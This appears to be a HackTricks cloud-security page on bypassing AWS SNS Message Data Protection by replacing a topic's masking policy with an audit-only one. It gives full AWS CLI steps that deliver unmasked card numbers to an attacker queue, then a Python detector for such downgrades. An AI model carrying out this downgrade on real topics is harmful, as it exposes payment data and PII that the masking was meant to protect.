AWS - SNS Message Data Protection Bypass via Policy Downgrade

Tip

Learn and practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE). Learn and practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

If you hold sns:PutDataProtectionPolicy on a topic, you can replace its Message Data Protection policy, swapping the Deidentify/Deny statements for an Audit-only policy (or simply dropping the Outbound controls), so that sensitive values such as credit card numbers are delivered unmodified to a subscription you control.

Requirements

  • Permission to call sns:PutDataProtectionPolicy on the target topic (and usually sns:Subscribe, if you want to receive the data yourself).
  • A standard SNS topic (Message Data Protection is only available on standard topics).

Attack Steps

  • Variables
REGION=us-east-1
  1. Create a standard topic and an attacker-controlled SQS queue, and allow only this topic to send to the queue
TOPIC_ARN=$(aws sns create-topic --name ht-dlp-bypass-$(date +%s) --region $REGION --query TopicArn --output text)
Q_URL=$(aws sqs create-queue --queue-name ht-dlp-exfil-$(date +%s) --region $REGION --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# Queue policy: only sns.amazonaws.com, and only on behalf of this topic, may SendMessage to the queue (jq is used to embed the policy as an escaped JSON string)
aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes "$(jq -n --arg q "$Q_ARN" --arg t "$TOPIC_ARN" \
  '{Policy: ({Version:"2012-10-17",Statement:[{Effect:"Allow",Principal:{Service:"sns.amazonaws.com"},Action:"sqs:SendMessage",Resource:$q,Condition:{ArnEquals:{"aws:SourceArn":$t}}}]} | tojson)}')"
  2. Attach a data protection policy that masks credit card numbers on outbound messages
cat > /tmp/ht-dlp-policy.json <<'JSON'
{
"Name": "__ht_dlp_policy",
"Version": "2021-06-01",
"Statement": [{
"Sid": "MaskCCOutbound",
"Principal": ["*"],
"DataDirection": "Outbound",
"DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
"Operation": { "Deidentify": { "MaskConfig": { "MaskWithCharacter": "#" } } }
}]
}
JSON
aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-policy.json)"
  3. Subscribe the attacker queue, publish a message containing a test credit card number, and verify that it is masked
SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --query SubscriptionArn --output text)
aws sns publish --region $REGION --topic-arn "$TOPIC_ARN" --message 'payment:{cc:4539894458086459}'
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All

Expected excerpt shows masking (hashes):

"Message" : "payment:{cc:################}"
  4. Downgrade the policy to audit-only (no Deidentify/Deny statements affecting Outbound)

For SNS, Audit statements must be Inbound. Replacing the policy with an Inbound-only Audit statement removes any Outbound de-identification, so messages flow to subscribers unmodified. The new policy is still "valid" and the topic still shows a data protection policy attached, which is what makes the downgrade easy to miss.

cat > /tmp/ht-dlp-audit-only.json <<'JSON'
{
"Name": "__ht_dlp_policy",
"Version": "2021-06-01",
"Statement": [{
"Sid": "AuditInbound",
"Principal": ["*"],
"DataDirection": "Inbound",
"DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
"Operation": { "Audit": { "SampleRate": 99, "NoFindingsDestination": {} } }
}]
}
JSON
aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-audit-only.json)"
  5. Publish the same message again and verify that the unmasked value is delivered
aws sns publish --region $REGION --topic-arn "$TOPIC_ARN" --message 'payment:{cc:4539894458086459}'
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All

Expected excerpt shows the credit card number in clear text:

"Message" : "payment:{cc:4539894458086459}"

Impact

  • Switching a topic from de-identification/deny to audit-only (or otherwise removing its Outbound controls) lets PII and secrets pass unmodified to attacker-controlled subscriptions, exfiltrating data that should have been masked or blocked.
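The defensive counterpart to the steps above is to tell, from a topic's policy document or from the sns:PutDataProtectionPolicy CloudTrail event, whether any Outbound Deidentify/Deny statement survives. The following is an added example and not part of the HackTricks page or of any AWS tooling: the two policy documents are constructed to mirror the ones used above, the CloudTrail records are constructed samples, and the field names under requestParameters (resourceArn, and dataProtectionPolicy as a JSON string) are an assumption. It runs offline; to check a live topic, feed it the output of aws sns get-data-protection-policy.

```python
import json
from typing import Any, Dict, List, Tuple

# Operations that actually change or block a message; Audit only records findings.
PROTECTIVE_OPS = ("Deidentify", "Deny")

# Constructed sample policies mirroring the two used in the attack steps.
PROTECTED_POLICY: Dict[str, Any] = {
    "Name": "__ht_dlp_policy",
    "Version": "2021-06-01",
    "Statement": [{
        "Sid": "MaskCCOutbound",
        "Principal": ["*"],
        "DataDirection": "Outbound",
        "DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
        "Operation": {"Deidentify": {"MaskConfig": {"MaskWithCharacter": "#"}}},
    }],
}

AUDIT_ONLY_POLICY: Dict[str, Any] = {
    "Name": "__ht_dlp_policy",
    "Version": "2021-06-01",
    "Statement": [{
        "Sid": "AuditInbound",
        "Principal": ["*"],
        "DataDirection": "Inbound",
        "DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
        "Operation": {"Audit": {"SampleRate": 99, "NoFindingsDestination": {}}},
    }],
}


def outbound_controls(policy: Dict[str, Any]) -> List[str]:
    """Sids of statements that Deidentify or Deny on the Outbound path.

    Only these stop a subscriber from receiving the raw value; Audit statements
    and Inbound-only statements do not.
    """
    sids = []
    for st in policy.get("Statement", []):
        if st.get("DataDirection") != "Outbound":
            continue
        if any(op in st.get("Operation", {}) for op in PROTECTIVE_OPS):
            sids.append(st.get("Sid", "<no-sid>"))
    return sids


def is_downgrade(old: Dict[str, Any], new: Dict[str, Any]) -> bool:
    """True when a topic that had Outbound Deidentify/Deny ends up with none."""
    return bool(outbound_controls(old)) and not outbound_controls(new)


def find_downgrades(events: List[Dict[str, Any]],
                    known: Dict[str, Dict[str, Any]]) -> List[Tuple[str, str]]:
    """Walk CloudTrail records in order and return (topicArn, principalArn) for
    every sns:PutDataProtectionPolicy call that removed the last Outbound control.

    `known` maps topic ARN -> last policy seen (seed it from
    get-data-protection-policy) and is updated as events are processed.
    The requestParameters field names used here are an assumption.
    """
    hits = []
    for ev in events:
        if ev.get("eventSource") != "sns.amazonaws.com" or ev.get("eventName") != "PutDataProtectionPolicy":
            continue
        params = ev.get("requestParameters", {})
        topic = params.get("resourceArn")
        raw = params.get("dataProtectionPolicy", "{}")
        new_policy = json.loads(raw) if isinstance(raw, str) else raw
        if is_downgrade(known.get(topic, {}), new_policy):
            hits.append((topic, ev.get("userIdentity", {}).get("arn", "<unknown>")))
        known[topic] = new_policy
    return hits


# Constructed CloudTrail-style records: a protective policy is set, then downgraded.
TOPIC = "arn:aws:sns:us-east-1:123456789012:ht-dlp-bypass"
SAMPLE_EVENTS = [
    {"eventSource": "sns.amazonaws.com", "eventName": "PutDataProtectionPolicy",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/admin"},
     "requestParameters": {"resourceArn": TOPIC, "dataProtectionPolicy": json.dumps(PROTECTED_POLICY)}},
    {"eventSource": "sns.amazonaws.com", "eventName": "PutDataProtectionPolicy",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/attacker"},
     "requestParameters": {"resourceArn": TOPIC, "dataProtectionPolicy": json.dumps(AUDIT_ONLY_POLICY)}},
]

if __name__ == "__main__":
    for topic, who in find_downgrades(SAMPLE_EVENTS, {}):
        print(f"DOWNGRADE: {who} removed the Outbound Deidentify/Deny controls on {topic}")
```

The check deliberately ignores Audit statements and anything with DataDirection Inbound: a topic can keep a perfectly valid policy document and still deliver clear text, so "a data protection policy is attached" is not a useful control on its own. Alerting on every sns:PutDataProtectionPolicy call is the coarser alternative if you do not keep the previous policy around to compare against.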
